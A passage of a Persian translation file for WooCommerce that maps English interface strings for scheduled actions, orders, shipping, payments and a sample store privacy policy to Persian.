ignored'=>'اقدام نادیده گرفته شده','Action Group'=>'گروه فعالیت','No actions found'=>'فعالیتی یافت نشد','Search Scheduled Actions'=>'جستجوی برنامه ریزی شده','View Action'=>'فعالیت جدید','New Scheduled Action'=>'برنامه ریزی جدید','Edit Scheduled Action'=>'ویرایش برنامه ریزی شده','Add New Scheduled Action'=>'افزودن اقدام جدید برنامه ریزی شده','postIn-Progress'=>'در حال پیش رفت','action failed: %s'=>'عمل شکست خورده است: %s','action complete'=>'تکمیل فعالیت','action started'=>'فعالیت شروع شد','action canceled'=>'لغو فعالیت','action created'=>'ایجاد فعالیت','There was an error running the action scheduler: %s'=>'بروز خطا در برنامه ریزی فعالیت: %s','Attempting to reduce used memory...'=>'تلاش برای کاهش حافظه مورد استفاده...','Error processing action %1$s: %2$s'=>'خطا در پردازش فعالیت %1$s: %2$s','Started processing action %s'=>'پردازش فعالیت شروع شده %s','Successfully processed change for action: %s'=>'موفقیت پروسه تغییرات برای فعالیت: %s','Successfully canceled action: %s'=>'موفقیت لغو فعالیت: %s','Successfully executed action: %s'=>'موفقیت اجرای فعالیت: %s','Non-repeating'=>'بدون تکرار','Every %s'=>'هرکدام %s','Now!'=>'اکنون!','Enter a different address'=>'آدرس دیگری وارد نمائید','Change address'=>'تغییر آدرس','No shipping options were found for %s.'=>'هیچ گزینه‌ی حمل و نقلی برای %s پیدا نشد.','Enter your address to view shipping options.'=>'آدرس خود را برای مشاهده گزینه‌های حمل و نقل وارد کنید.','Every minute'=>'هر دقیقه','Canceled'=>'لغو شده','Invalid schedule. Cannot save action.'=>'زمان بندی نامعتبر است. نمی تواند ذخیره شود.','In-progress'=>'در حال انجام','Pending'=>'در انتظار','Failed'=>'ناموفق',' (%s ago)'=>' (%s قبل)','New Order: #{order_number}'=>'سفارش جدید ({order_number})','Order Failed: #{order_number}'=>'سفارش نا‌موفق (#{order_number})','Order Refunded: {order_number}'=>'سفارش مسترد شد: {order_number}','Password Reset Request'=>'درخواست تغییر رمز','Partial Refund: Order {order_number}'=>'استرداد غیر کلی: سفارش {order_number}',' (%s)'=>' (%s)','Password Reset Request for {site_title}'=>'درخواست تغییر رمز برای {site_title}','Admin menu nameScheduled Actions'=>'فعالیت‌های برنامه ریزی شده','Stock levels increased:'=>'سطح موجودی افزایش یافت:','Unable to restore stock for item %s.'=>'نمی توان موجودی برای آیتم %s بازیابی کرد.','Stock levels reduced:'=>'سطح موجودی کاهش یافت:','Unable to reduce stock for item %s.'=>'نمی توان موجودی برای آیتم %s کاهش داد.','postFailed'=>'ناموفق بود','Error saving action: %s'=>'خطا در عمل ذخیره‌سازی:%s','Unable to save action.'=>'نمی توان عمل را ذخیره کرد.','action reset'=>'عمل مجدد تنظیم شد','Run'=>'اجرا','Claim ID'=>'شناسه مطالبه','Log'=>'گزارش','Scheduled Date'=>'تاریخ زمانبندی','Recurrence'=>'تکرار مجدد','Group'=>'گروه','Arguments'=>'آرگمان‌ها','Hook'=>'هوک','Scheduled Actions'=>'عملیات برنامه ریزی شده','There are too many concurrent batches.'=>'چندین بار همگام وجود دارد.','Invalid action ID. No status found.'=>'شناسه فعالیت نامعتبر است وضعیت یافت نشد.','Search hook, args and claim ID'=>'جستجو هوک، args و claim ID','There are too many concurrent batches, but the run is forced to continue.'=>'چندین بار هم همزمان وجود دارد، اما اجرا مجبور به ادامه دادن است.','unexpected shutdown: PHP Fatal error %1$s in %2$s on line %3$s'=>'خاموشی غیر منتظره: خطای PHP مهلک %1$s در %2$s خط %3$s','Could not process change for action: "%1$s" (ID: %2$d). Error: %3$s'=>'تغییر برای اقدام پردازش نشد: "%1$s" (شناسه: %2$d). خطا: %3$s','Action [%1$s] has invalid arguments. It cannot be JSON decoded to an array. $args = %2$s'=>'عمل [%1$s] دارای آرگومان های نامعتبر است. نمی توان آن را JSON در یک آرایه رمزگشایی کرد. $args = %2$s','Sort by latest'=>'مرتب‌سازی بر اساس جدیدترین','Scheduled actions are hooks triggered on a certain date and time.'=>'اقدامات زمان‌بندی‌شده، هوک‌هایی هستند که در تاریخ و زمان مشخصی اجرا می‌شوند.','This function should not be called before plugins_loaded.'=>'این تابع نباید قبل از plugins_loaded فراخوانی شود.','No actions found in trash'=>'هیچ فعالیتی در زباله دان پیدا نشد','Scheduled Action'=>'فعالیت برنامه ریزی شده','Unable to mark failure on action %s. Database error.'=>'قادر به نشان دادن شکست در فعالیت %s نیست خطای پایگاه داده.','Unable to unlock claim on action %s. Database error.'=>'قادر به بازگرداندن فعالیت %s نیست. خطای پایگاه داده.','Unable to unlock claim %s. Database error.'=>'قادر به مطالبه %s نیست. خطای پایگاه داده.','Unable to claim actions. Database error.'=>'قادر به مطالبه عملیات نیست. خطای پایگاه داده.','The claim has been lost. Aborting current batch.'=>'این مطالبه از بین رفته است. قطع کردن دسته فعلی.','Cancel the action now to avoid it being run in future'=>'در حال حاضر فعالیت را لغو کنید تا از شروع آن در آینده اجتناب شود','Process the action now as if it were run as part of a queue'=>'اکنون فعالیت را پردازش کنید، به طوری که آن را به عنوان بخشی از یک صف اجرا کنید','[{site_title}]: Order #{order_number} has failed'=>'[{site_title}]: سفارش شماره {order_number} با شکست مواجه شد','The class attached to the "woocommerce_queue_class" does not implement the WC_Queue_Interface interface. The default %s class will be used instead.'=>'کلاس متصل به "woocommerce_queue_class" رابط WC_Queue_Interface را پیاده‌سازی نمی‌کند. به جای آن از کلاس پیشفرض %s استفاده خواهد شد.','%d batch executed.'=>'%d دسته ای اجرا شده است.','%d scheduled task completed.'=>'%d وظایف برنامه ریزی شده به پایان رسید.','Found %d scheduled task'=>'یافت نشد %d وظایف زمانبندی شده','In-Progress (%s)'=>'در حال پیش رفت (%s)','Maximum simultaneous queues already in progress (%s queue). No additional queues will begin processing until the current queues are complete.'=>'حداکثر صف‌های هم‌زمان در حال انجام است (صف %s). تا زمانی که صف‌های فعلی کامل نشود، هیچ صف دیگری شروع به پردازش نخواهد کرد.','Running %d action'=>'درحال اجرای %d عمل','The group "%s" does not exist.'=>'گروه "%s" وجود ندارد.','%s month'=>'%s ماه','%s minute'=>'%s دقیقه','%s hour'=>'%s ساعت','%s day'=>'%s روز','%s second'=>'%s ثانیه','%s week'=>'%s هفته','%s year'=>'%s سال','Review type name.'=>'نام نوع نقد و بررسی.','Amount of products.'=>'مقدار محصولات.','Product type name.'=>'نام نوع محصول.','Amount of orders.'=>'مقدار سفارشات.','Order status name.'=>'نام وضعیت سفارش.','Customer type name.'=>'نام نوع مشتری.','Non-paying customer'=>'مشتری بدون پرداخت','Paying customer'=>'مشتری پرداخت کننده','Full name of currency.'=>'نام کامل واحد پول.','WooCommerce Customer Data'=>'داده مشتری ووکامرس','Sorry, we do not have enough "%1$s" in stock to fulfill your order (%2$s available). We apologize for any inconvenience caused.'=>'متاسفانه تعداد موجودی محصول «%1$s» از تعداد مورد نیاز شما کمتر است و هم اکنون %2$s عدد از این محصول برای سفارش در انبار موجود است. بابت مشکل پیش آمده پوزش میخواهیم.','Details for order #{order_number} on {site_title}'=>'جزئیات سفارش #{order_number} در {site_title}','Amount of customers.'=>'تعداد مشتری‌ها.','View affected templates'=>'نمایش قالب‌های متاثر','Your {site_title} order is now complete'=>'سفارش {site_title} شما اکنون کامل شد','Invalid review ID.'=>'شناسه مرور نامعتبر.','Invalid review content.'=>'محتوای نقد نامعتبر.','WooCommerce Customer Payment Tokens'=>'توکن‌های پرداخت مشتری ووکامرس','WooCommerce Customer Downloads'=>'دانلودهای مشتری ووکامرس','WooCommerce Customer Orders'=>'سفارش‌های مشتری ووکامرس','Status of the review.'=>'وضعیت نقد.','The object cannot be deleted.'=>'شیء نمی تواند حذف شود.','The object has already been trashed.'=>'شیء اکنون در زباله‌دان است.','Data resource ID.'=>'شناسه منابع داده.','Full name of state.'=>'نام کامل استان.','List of states in this country.'=>'لیست استان‌های این کشور.','List of supported currencies.'=>'لیست واحدهای پولی پشتیبانی شده.','The unit lengths are defined in for this country.'=>'طول واحد در این کشور تعریف شده است.','Unique identifier for the product that the review belongs to.'=>'شناسه منحصر به فرد برای محصول که بررسی به آن تعلق دارد.','Order Cancelled: #{order_number}'=>'سفارش لغو شده: # {order_number}','Sorry, you are not allowed to change the comment type.'=>'با عرض پوزش، شما مجاز به تغییر نوع نظر نیستید.','Ensure result set excludes reviews assigned to specific user IDs.'=>'اطمینان حاصل شود که مجموعه نتیجه، بررسی‌هایی را که برای شناسه‌های کاربری خاص اختصاص داده شده، حذف می کند.','If true, this note will be attributed to the current user. If false, the note will be attributed to the system.'=>'اگر درست باشد، این یادداشت به کاربر فعلی نسبت داده می شود. اگر نادرست باشد، یادداشت به سیستم اعمال خواهد شد.','If you copied over a template file to change something, then you will need to copy the new version of the template and apply your changes again.'=>'اگر برای تغییر چیزی بیش از یک فایل الگو کپی کردید، باید نسخه جدیدی از الگو را کپی کنید و دوباره تغییرات خود را اعمال کنید.','The object does not support trashing. Set \'%s\' to delete.'=>'این کالا از زباله‌دان پشتیبانی نمی کند. \'%s\' را برای حذف تنظیم کنید.','Limit response to reviews published before a given ISO8601 compliant date.'=>'پاسخ محدود به بررسی منتشر شده قبل از یک تاریخ سازگار با ISO8601 داده شده است.','Controls the stock status of the product.'=>'وضعیت موجودی محصول را کنترل می کند.','The unit weights are defined in for this country.'=>'وزن این واحد برای این کشور تعریف شده است.','There are no locations matching these parameters.'=>'هیچ مکانی منطبق این پارامترها وجود ندارد.','There are no currencies matching these parameters.'=>'هیچ مقداری مطابق با این پارامترها وجود ندارد.','Limit result set to reviews assigned a specific status.'=>'نتیجه محدود شده به بررسی اختصاص داده شده یک وضعیت خاص است.','Limit result set to that from a specific author email.'=>'نتیجه محدود شده به یک ایمیل نویسنده خاص است.','Limit result set to reviews assigned to specific user IDs.'=>'نتیجه محدود به بررسی اختصاص داده شده به شناسه کاربر خاص است.','Limit result set to reviews assigned to specific product IDs.'=>'نتیجه محدود به بررسی اختصاص داده شده به شناسه محصول خاص است.','Cannot create existing product review.'=>'نمی توان بررسی محصول موجود را ایجاد کرد.','Update your theme to the latest version. If no update is available contact your theme author asking about compatibility with the current WooCommerce version.'=>'قالب خود را به آخرین نسخه بروز رسانی کنید. اگر هیچ بروز رسانی در دسترس نیست، با نویسنده قالب خود در مورد سازگاری با نسخه فعلی WooCommerce تماس بگیرید.','Product review field exceeds maximum length allowed.'=>'فیلد بررسی محصول بیش از حداکثر طول مجاز است.','%1$s is not valid. You can look up the correct Eircode here.'=>'%1$s معتبر نیست شما می توانید یک Eircode درست را در اینجا جستجو کنید.','Amount of coupons.'=>'میزان کدهای تخفیف.','Coupon type name.'=>'نام نوع کدتخفیف.','Limit response to resources created after a given ISO8601 compliant date.'=>'محدود کردن پاسخ به منابع ایجاد شده پس از تاریخ انطباق با ISO8601.','Number of decimal points shown in displayed prices for this country.'=>'تعداد نقاط اعشاری‌ که در قیمت‌های نمایش داده شده برای این کشور، نشان داده می‌شود.','Your {site_title} order has been received!'=>'سفارش شما در {site_title} دریافت شد!','Your {site_title} account has been created!'=>'حساب شما در {site_title} ایجاد شد!','Thanks for shopping with us'=>'از خرید شما متشکریم','Shipping instance ID.'=>'آیدی نمونه حمل.','An identifier for the group this setting belongs to.'=>'یک شناسه برای گروه این تنظیم متعلق به.','Attributes totals.'=>'مجموع ویژگی‌ها.','Tags totals.'=>'مجموع برچسب‌ها.','Categories totals.'=>'مجموع دسته بندی‌ها.','Reviews totals.'=>'مجموع نظرات.','Coupons totals.'=>'مجموع کدهای تخفیف.','Customers totals.'=>'مجموع مشتری‌ها.','Products totals.'=>'مجموع محصولات.','Orders totals.'=>'مجموع سفارشات.','Amount of reviews.'=>'تعداد نقد و بررسی‌ها.','Limit result set to products with specified stock status.'=>'نتایج محدود شده روی محصولاتی با کلاس مالیاتی خاص. .','File ID.'=>'شناسه پرونده.','Variation status.'=>'وضعیت متغیر.','Avatar URLs for the object reviewer.'=>'URL‌های آواتار برای بررسی کالا.','Avatar URL with image size of %d pixels.'=>'URL آواتار با اندازه %d پیکسل.','Unique identifier for the product.'=>'شناسه‌ی منحصر به فرد برای محصول.','Supported features for this payment gateway.'=>'ویژگی‌های پشتیبانی شده برای این درگاه پرداخت.','Order note author.'=>'نویسنده یاداشت سفارش.','ISO4217 currency code.'=>'ISO4217 کد واحد پولی.','Data resource description.'=>'توصیف اطلاعات منابع.','List of supported states in a given country.'=>'لیست کشورهای پشتیبانی شده در یک کشور مشخص.','List of supported continents, countries, and states.'=>'فهرست قاره‌ها، کشورها و استان‌های پشتیبانی شده.','Thousands separator for displayed prices in this country.'=>'جداکننده هزارگان برای قیمت‌های نمایش داده شده در این کشور.','Full name of country.'=>'نام کشور.','Decimal separator for displayed prices for this country.'=>'جداکننده اعشار برای قیمت‌های نمایش داده شده برای این کشور.','Currency symbol position for this country.'=>'موقعیت نماد ارز برای این کشور.','ISO3166 alpha-2 country code.'=>'ISO3166 آلفا-2 کد کشور.','List of countries on this continent.'=>'لیست کشورهای این قاره.','Full name of continent.'=>'نام کامل قاره.','2 character continent code.'=>'2 کاراکتر کد قاره.','Updating review status failed.'=>'بروز رسانی وضعیت بازبینی انجام نشد.','Default ISO4127 alpha-3 currency code for the country.'=>'کد پیشفرض ISO4127 alpha-3 برای کشور.','Updating review failed.'=>'بروز رسانی بررسی انجام نشد.','Placeholder image'=>'جایابی عکس','WooCommerce Services icon'=>'آیکن خدمات ووکامرس','ShipStation'=>'محل حمل','ShipStation icon'=>'آیکن محل حمل','Export all categories'=>'برون بری همه دسته بندی‌ها','Set up Stripe for me using this email:'=>'راه اندازی استریپ برای من با استفاده از این ایمیل:','WooCommerce PayPal Checkout Gateway'=>'درگاه پرداخت PayPal WooCommerce','We recommend using ShipStation to save time at the post office by printing your shipping labels at home. Try ShipStation free for 30 days.'=>'توصیه می کنیم با استفاده از ShipStation با صرفه جویی در زمان در دفتر پست با چاپ برچسب‌های حمل و نقل خود در خانه، صرفه جویی کنید. ظرف 30 روز ShipStation را امتحان کنید.','Set up PayPal for me using this email:'=>'تنظیم کنید پی پال را برای استفاده از این ایمیل:','We\'ll use %1$s for product weight and %2$s for product dimensions.'=>'از %1$s برای وزن محصول و %2$s برای ابعاد محصول استفاده می کنیم.','This is the attachment ID, or image URL, used for placeholder images in the product catalog. Products with no image will use this.'=>'این شناسه پیوست یا URL تصویر است که برای جایگاه تصاویر در کاتالوگ محصول مورد استفاده قرار می گیرد. محصولات بدون تصویر از این استفاده خواهند کرد.','Which product category should be exported?'=>'کدام نوع محصول باید صادر شود؟','When handling an %s, should access to downloadable files be revoked and download logs cleared?'=>'هنگام مدیریت %s، دسترسی به فایل‌های دانلود را لغو کند و گزارش‌های مربوط را پاک کند؟','When handling an %s, should personal data within orders be retained or removed?'=>'هنگام مدیریت %s، آیا داده‌های شخصی در دستورات بایستی حفظ یا حذف شوند؟','A live rate is the exact cost to ship an order, quoted directly from the shipping carrier.'=>'نرخ زنده هزینه دقیق برای ارسال سفارش است که به طور مستقیم از حامل حمل نقل شده است.','Your theme (%s) contains outdated copies of some WooCommerce template files. These files may need updating to ensure they are compatible with the current version of WooCommerce. Suggestions to fix this:'=>'قالب شما (%s) حاوی نسخه‌های قدیمی برخی از فایل‌های الگو WooCommerce است. این فایل‌ها ممکن است نیاز به به روز رسانی داشته باشند تا اطمینان حاصل شود که آنها با نسخه فعلی WooCommerce سازگار هستند. پیشنهادات برای اصلاح این:','Enter a number to set stock quantity at the variation level. Use a variation\'s \'Manage stock?\' check box above to enable/disable stock management at the variation level.'=>'یک عدد را برای تعیین مقدار موجودی در سطح متغیر وارد کنید. از "مدیریت موجودی" استفاده کنید؟ برای فعال کردن/غیرفعال کردن مدیریت موجودی در سطح متغیرها، کادر بالا را تیک بزنید.','Low stock amount'=>'کمبود موجودی انبار','Enter attachment ID or URL to an image'=>'شناسه پیوست یا URL را به یک تصویر وارد کنید','If you\'d like to offer live rates from a specific carrier (e.g. UPS) you can find a variety of extensions available for WooCommerce here.'=>'اگر می خواهید از یک حامل خاص (به عنوان مثال: UPS) نرخ زنده ارائه دهید. شما می توانید انواع افزونه‌های موجود برای WooCommerce را پیدا کنید در اینجا.','We\'ve created two Shipping Zones - for %s and for the rest of the world. Below you can set Flat Rate shipping costs for these Zones or offer Free Shipping.'=>'ما دو منطقه حمل و نقل را برای %s و برای بقیه دنیا ایجاد کرده‌ایم. در زیر می‌توانید هزینه حمل و نقل ثابتی را برای این مناطق تعیین کنید یا حمل و نقل رایگان ارائه کنید.','Kilograms'=>'کیلوگرم','Pounds'=>'پوند','Grams'=>'گرم','Ounces'=>'اونس','Inches'=>'اینچ','Yards'=>'یارد','Meters'=>'متر','Millimeters'=>'میلیمتر','Centimeters'=>'سانتی‌متر','Are you sure you want to remove the selected items?'=>'آیا مطمئن هستید که می خواهید آیتم‌های انتخاب شده را حذف کنید؟','You may need to manually restore the item\'s stock.'=>'ممکن است لازم باشد به صورت دستی موجودی را بازگردانید.','Sud Sardegna'=>'Sud Sardegna','Item moved down'=>'آیتم به پایین انتقال یافت','Item moved up'=>'آیتم به بالا انتقال یافت رفت','Alto Paraguay'=>'Alto Paraguay','Presidente Hayes'=>'Presidente Hayes','Amambay'=>'Amambay','Central'=>'Central','Cordillera'=>'Cordillera','San Pedro'=>'San Pedro','Apartment, suite, unit, etc.'=>'آپارتمان، مجتمع، واحد و...','%d API key permanently revoked.'=>'%d کلید API به طور دائم لغو می شود.','Cannot set attributes due to invalid parent product.'=>'خصوصیات را نمی توان به دلیل محصول والد نامعتبر تنظیم کرد.','This action cannot be reversed. Are you sure you wish to erase personal data from the selected orders?'=>'این عمل قابل برگشت نیست. آیا مطمئن هستید که می خواهید داده‌های شخصی را از سفارشات انتخاب شده پاک کنید؟','Billing Address'=>'آدرس صورتحساب','Shipping Address'=>'آدرس حمل و نقل','Payer first name'=>'نام خریدار','Payer last name'=>'نام خانوادگی خریدار','Payer PayPal address'=>'آدرس پی پال پرداخت کننده','MySQL version string.'=>'رشته نسخه MySQL.','Your CSV needs to include columns in a specific order. %1$sClick here to download a sample%2$s.'=>'پرونده CSV شما نیاز دارد شامل ستون‌هایی در سفارش خواص باشد.%1$s برای دانلود نمونه کلیک کنید%2$s.','Shipping Address 1'=>'آدرس حمل و نقل','Billing Address 1'=>'آدرس صورتحساب','terms and conditions'=>'شرایط و مقررات','privacy policy'=>'سیاست حفظ حریم خصوصی','eCheck ending in %1$s'=>'eCheck تمام می شود در %1$s','PayPal allows us to send one address. If you are using PayPal for shipping labels you may prefer to send the shipping address rather than billing. Turning this option off may prevent PayPal Seller protection from applying.'=>'پی پال به ما اجازه ارسال یک آدرس می دهد. اگر از پی پال برای حمل و نقل استفاده می کنید شما ممکن است برای ارسال آدرس حمل و نقل را بجای صورت حساب ترجیح دهید.خاموش کردن این گزینه ممکن است مانع از حفاظت فروشنده پی پال از درخواست شود.','This will be how your name will be displayed in the account section and in reviews'=>'اسم شما به این صورت در حساب کاربری و نظرات دیده خواهد شد','United States (US) dollar'=>'United States (US) dollar','Account details:'=>'جزئیات اکانت:','%s page'=>'%s صفحه','Required'=>'الزامی','%1$s (#%2$s)'=>'%1$s (#%2$s)','%1$s – %2$s'=>'%1$s – %2$s','Any "%1$s" method'=>'هر "%1$s" روش','Highlight required fields with an asterisk'=>'برجسته کردن فیلدهای ضروری با ستاره','Please see the PayPal Privacy Policy for more details.'=>'برای اطلاعات بیشتر صفحه خط مشی حریم خصوصی پی پال را بخوانید.','Optionally add some text for the terms checkbox that customers must accept.'=>'به صورت دلخواه، برخی از متن‌ها را در کادر گزینه‌ها اضافه کنید که مشتریان باید آن را بپذیرند.','Other locations'=>'مکان‌های دیگر','Take payments in person via checks. This offline gateway can also be useful to test purchases.'=>'پرداخت‌های شخصی را از طریق چک انجام دهید. این دروازه آفلاین همچنین می تواند برای تست خرید مفید باشد.','We accept payments through PayPal. When processing payments, some of your data will be passed to PayPal, including information required to process or support the payment, such as the purchase total and billing information.'=>'ما پرداخت‌ها را از طریق PayPal پذیرش می کنیم. هنگام پردازش پرداخت‌ها، برخی از داده‌های شما به PayPal منتقل خواهند شد، از جمله اطلاعاتی که برای پردازش یا پشتیبانی از پرداخت، مانند کل خرید و اطلاعات صورتحساب، مورد نیاز است.','PayPal Standard redirects customers to PayPal to enter their payment information.'=>'PayPal Standard مشتریان خود را به PayPal هدایت می کند تا اطلاعات پرداخت خود را وارد کنند.','Take payments in person via BACS. More commonly known as direct bank/wire transfer.'=>'پرداخت‌ها را شخصاً از طریق BACS انجام دهید. بیشتر به عنوان انتقال مستقیم بانکی/سیمی شناخته می شود.','%s field'=>'فیلد %s','No page set'=>'برگه‌ای تنظیم نشده','These options let you change the appearance of the WooCommerce checkout.'=>'این گزینه به شما اجازه می‌دهد ظاهر تسویه حساب ووکامرس را تغییر دهید.','Comma-separated list of search stopwords in your languageabout,an,are,as,at,be,by,com,for,from,how,in,is,it,of,on,or,that,the,this,to,was,what,when,where,who,will,with,www'=>'درباره، یک، هستند، همانطور که، در، توسط، توسط، برای، از، چگونه، در، آن، از، روی، یا، اینکه، این، به، چه، چه زمانی، کجا، چه کسی، با، www','I have read and agree to the website %s'=>'من %s سایت را خوانده ام و آن را می پذیرم','In this subsection you should list which third party payment processors you’re using to take payments on your store since these may handle customer data. We’ve included PayPal as an example, but you should remove this if you’re not using PayPal.'=>'در این قسمت شما باید پردازش‌های شخص ثالثی را که استفاده می‌کنید برای پرداخت در فروشگاه خود لیست کنید، زیرا ممکن است داده‌های مشتری را اداره کند. ما پی‌پال را بعنوان مثال آورده‌ایم، اما اگر شما از پی‌پال استفاده نمی‌کنید باید این را حذف کنید.','In this section you should list who you’re sharing data with, and for what purpose. This could include, but may not be limited to, analytics, marketing, payment gateways, shipping providers, and third party embeds.'=>'در این بخش شما باید چیزهایی که به اشتراک می‌گذارید و اهدافی که از آنها استفاده می کنید لیست کنید. این می‌تواند شامل باشد، اما ممکن است محدود به تجزیه و تحلیل، بازاریابی، درگاه‌های پرداخت، ارائه دهندگان حمل و نقل و شخص ثالث نباشد.','We share information with third parties who help us provide our orders and store services to you; for example --'=>'ما اطلاعات را با اشخاص ثالثی به اشتراک می گذاریم که به ما سفارشات خود را ارائه می دهند و خدمات را برای شما ذخیره می کنند؛ مثلا --','Who on our team has access'=>'چه کسانی در تیم ما دسترسی خواهد داشت','What we share with others'=>'ما چه چیزهایی را با دیگران به اشتراک میگزاریم','We will also store comments or reviews, if you choose to leave them.'=>'همینطور ما دیدگاه‌ها و نظرات شما را ذخیره می‌کنیم اگر تصمیم بگیرید که نظر بدید.','Our team members have access to this information to help fulfill orders, process refunds and support you.'=>'اعضای تیم ما به این اطلاعات دسترسی دارند تا به انجام سفارشات، پردازش استرداد و پشتیبانی شما کمک کنند.','Order information like what was purchased, when it was purchased and where it should be sent, and'=>'اطلاعات سفارش مانند آنچه که خریداری شد، چه زمانی خریداری شد و کجا باید ارسال شود.','We generally store information about you for as long as we need the information for the purposes for which we collect and use it, and we are not legally required to continue to keep it. For example, we will store order information for XXX years for tax and accounting purposes. This includes your name, email address and billing and shipping addresses.'=>'ما به طور کلی اطلاعات مربوط به شما را تا زمانی که به اطلاعات مورد نیاز برای اهدافی که برای جمع‌آوری و استفاده از آن نیاز داریم ذخیره می‌کنیم و از نظر قانونی نیازی به ادامه آن نیستیم. به عنوان مثال، اطلاعات سفارش را برای XXX سال برای اهداف مالیاتی و حسابداری ذخیره می‌کنیم. این شامل نام، آدرس ایمیل و آدرس‌های صدور صورت حساب و حمل و نقل می‌شود.','Customer information like your name, email address, and billing and shipping information.'=>'اطلاعات مشتری، مانند نام شما، آدرس ایمیل و صورت حساب و اطلاعات حمل و نقل.','Members of our team have access to the information you provide us. For example, both Administrators and Shop Managers can access:'=>'اعضای تیم ما به اطلاعاتی که شما به ما میدهید دسترسی دارند. برای مثال هم ادمین و هم مدیر فروشگاه به این اطلاعات دسترسی دارند:','Send you marketing messages, if you choose to receive them'=>'اگر شما انتخاب کنید، برای شما ایمیل تبلیغاتی میفرستیم','Process payments and prevent fraud'=>'فرایند پرداخت و جلوگیری از تقلب','Improve our store offerings'=>'پیشنهادات فروشگاه ما را بهبود بخشد','Send you information about your account and order'=>'اطلاعات خود را برای حساب و سفارش ارسال کنید','Respond to your requests, including refunds and complaints'=>'پاسخ به درخواست‌]ای شما، شما بازپرداخت و شکایت','If you create an account, we will store your name, address, email and phone number, which will be used to populate the checkout for future orders.'=>'اگر شما یک حساب کاربری بسازید، ما اسم، آدرس، ایمیل و تلفن شما رو ذخیره می‌کنیم فقط برای استفاده خرید‌ها و پرداخت‌های بعدی شما.','When you purchase from us, we’ll ask you to provide information including your name, billing address, shipping address, email address, phone number, credit card/payment details and optional account information like username and password. We’ll use this information for purposes, such as, to:'=>'هنگام خرید از ما، از شما خواهش می‌کنیم اطلاعاتی از قبیل نام، آدرس صورت‌حساب، آدرس حمل و نقل، آدرس ایمیل، تلفن و اطلاعات کارت اعتباری/پرداخت و اطلاعات اختیاری حساب مانند نام کاربری و رمز عبور را ارائه کنید. ما از این اطلاعات برای اهدافی استفاده می‌کنیم، از جمله:','Comply with any legal obligations we have, such as calculating taxes'=>'مطابق با هر تعهد قانونی که ما داریم، مانند محاسبه مالیات','Set up your account for our store'=>'حساب کاربری خودتان را در فروشگاه ما بسازید','We’ll also use cookies to keep track of cart contents while you’re browsing our site.'=>'ما همچنین از کوکی‌ها برای پیگیری محتویات سبد خرید در حالی که شما در حال مرور سایت ما هستید استفاده می‌کنیم.','Note: you may want to further detail your cookie policy, and link to that section from here.'=>'پینوشت: شاید شما مایل باشین اطلاعات کوکی و یا لینک رودر این قسمت درج کنید.','Shipping address: we’ll ask you to enter this so we can, for instance, estimate shipping before you place an order, and send you the order!'=>'آدرس حمل و نقل: ما از شما خواهش می‌کنیم که این را وارد کنید بنابراین ما می‌توانیم، به عنوان مثال، ما می توانیم، پیش از سفارش شما، تخمین زده و سفارش خود را به شما ارسال کنیم!','Location, IP address and browser type: we’ll use this for purposes like estimating taxes and shipping'=>'محل سکونت، آدرس IP و نوع مرورگر: ما از این برای اهدافی مانند برآورد مالیات و حمل و نقل استفاده می‌کنیم','Products you’ve viewed: we’ll use this to, for example, show you products you’ve recently viewed'=>'محصولاتی که مشاهده کرده‌اید: ما از آن برای نشان دادن محصولاتی که اخیرا مشاهده کرده‌اید استفاده می‌کنیم','While you visit our site, we’ll track:'=>'هنگاه مشاهده شما از سایت ما، ما رهگیری می‌کنیم:','What we collect and store'=>'چه چیزی را طبقه بندی و نگهداری می‌کنیم','This sample language includes the basics around what personal data your store may be collecting, storing and sharing, as well as who may have access to that data. Depending on what settings are enabled and which additional plugins are used, the specific information shared by your store will vary. We recommend consulting with a lawyer when deciding what information to disclose on your privacy policy.'=>'این سیاست نمونه شامل اصولی از اطلاعات شخصی شما است که در فروشگاه شما جمع‌آوری، ذخیره و به اشتراک گذاشته می‌شود و نیز کسانی ممکن است به آن داده‌ها دسترسی داشته باشند. بسته به تنظیمات فعال و افزونه‌های اضافی استفاده می‌شود، اشتراک‌گذاری اطلاعات خاص توسط فروشگاه شما متفاوت خواهد بود. ما تصمیم می‌گیریم که چه اطلاعاتی در سیاست حفظ حریم خصوصی خود منتشر کنیم، با یک وکیل مشاوره می‌کنیم.','We collect information about you during the checkout process on our store.'=>'ما در طول فرآیند پرداخت در فروشگاه اطلاعات مربوط به شما را جمع‌آوری می‌کنیم.','User email'=>'ایمیل کاربر','Order Number'=>'شماره سفارش','Items Purchased'=>'موارد خریداری شده','Download count'=>'شمارنده دانلود','Access granted'=>'دسترسی داده شد','Browser User Agent'=>'عامل کاربری مرورگر','Payment Tokens'=>'توکن‌های پرداخت','Token'=>'توکن','Download ID'=>'شناسه دانلود','Access to Purchased Downloads'=>'دسترسی به دانلودهای خریداری شده','Please read and accept the terms and conditions to proceed with your order.'=>'لطفا شرایط و ضوابط را برای ادامه سفارش خود مطالعه و قبول کنید.','Personal data removed.'=>'اطلاعات شخصی پاک شد.','Shipping State'=>'استان مقصد','%1$s has been removed from your cart because it has since been modified. You can add it back to your cart here.'=>'%1$s از سبدخرید حذف شد چون تغییر کرده است. می توانید مجدد به سبدخرید اضافه کنید اینجا.','URL to edit the order'=>'آدرس اینترنتی برای ویرایش سفارش','display name%1$s %2$s'=>'%1$s %2$s','optional'=>'اختیاری','Customer Data'=>'داده مشتری','Billing First Name'=>'صورتحساب نام','Billing Last Name'=>'صورتحساب نام خانوادگی','Billing Company'=>'صورتحساب کمپانی','Billing City'=>'صورتحساب شهر','Billing Postal/Zip Code'=>'صورتحساب کدپستی','Billing State'=>'صورتحساب ایالت','Phone Number'=>'تلفن','Shipping First Name'=>'حمل و نقل نام','Shipping Last Name'=>'حمل و نقل نام خانوادگی','Shipping Company'=>'حمل و نقل کمپانی','Shipping City'=>'حمل و نقل شهر','Shipping Postal/Zip Code'=>'حمل و نقل کدپستی','User roleCustomer'=>'مشتری','User roleShop manager'=>'مدیر فروشگاه','Removed customer "%s"'=>'مشتری حذف شده "%s"','Purchased Downloads'=>'دانلودهای خریداری شده','Payment complete event failed.'=>'رویداد پرداخت کامل انجام نشد.','Update status event failed.'=>'بروزرسانی وضعیت رویداد شکست خورد.','Error during status transition.'=>'خطا هنگام انتقال وضعیت.','Name of the customer for the order'=>'نام مشتری برای سفارش','Order total formatted for locale'=>'فرمت مجموع سفارشات برای محلی','Used-up download permissions'=>'مجوزهای دانلود استفاده شده','Clean up download permissions'=>'مجوزهای دانلود پاکسازی شده','%d permissions deleted'=>'%d مجوزهای حذف شده','Removed personal data from order %s.'=>'حذف اطلاعات شخصی از سفارش %s.','Personal data within order %s has been retained.'=>'اطلاعات شخصی همراه سفارش %s حفظ شده است.','Removed access to 